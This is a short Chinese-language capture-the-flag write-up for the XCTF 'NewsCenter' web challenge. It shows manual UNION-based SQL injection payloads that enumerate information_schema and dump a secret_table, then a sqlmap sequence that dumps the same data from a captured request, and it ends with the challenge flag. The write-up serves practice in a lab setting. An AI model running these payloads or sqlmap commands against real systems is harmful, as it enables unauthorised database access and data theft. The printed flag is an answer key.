攻防世界-web进阶-NewsCenter

两个方法，嘿嘿嘿

 

手工注

 

首先用

' and 0 union select 1,2,3#

　　来初步判断该sql查询返回三列数据

 

 

然后就可以找表

' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS#

　

 

 

　然后看到了一个非常显眼的表，爆他

' and 0 union select 1,column_name,3 from information_schema.columns where table_name='secret_table'#

　　

 

 啥也别说了，直接整

' and 0 union select 1,id,fl4g from secret_table#

　　

 

 

sqlmap一把梭

 

用bp抓包，随便输入个数
将抓包后的数据存储在1.txt文件上（文件放在sqlmap的目录下），用sqlmap爆库，

python sqlmap.py -r 1.txt --dbs

　　

 

 接着爆表

python sqlmap.py -r 1.txt -D news --tables

　　

 

 爆字段

python sqlmap.py -r 1.txt -D news -T secret_table --columns

　　

 

 

整就完了

python sqlmap.py -r 1.txt -D news -T secret_table -C "fl4g,id" --dump

　　

 

 

QCTF{sq1_inJec7ion_ezzz}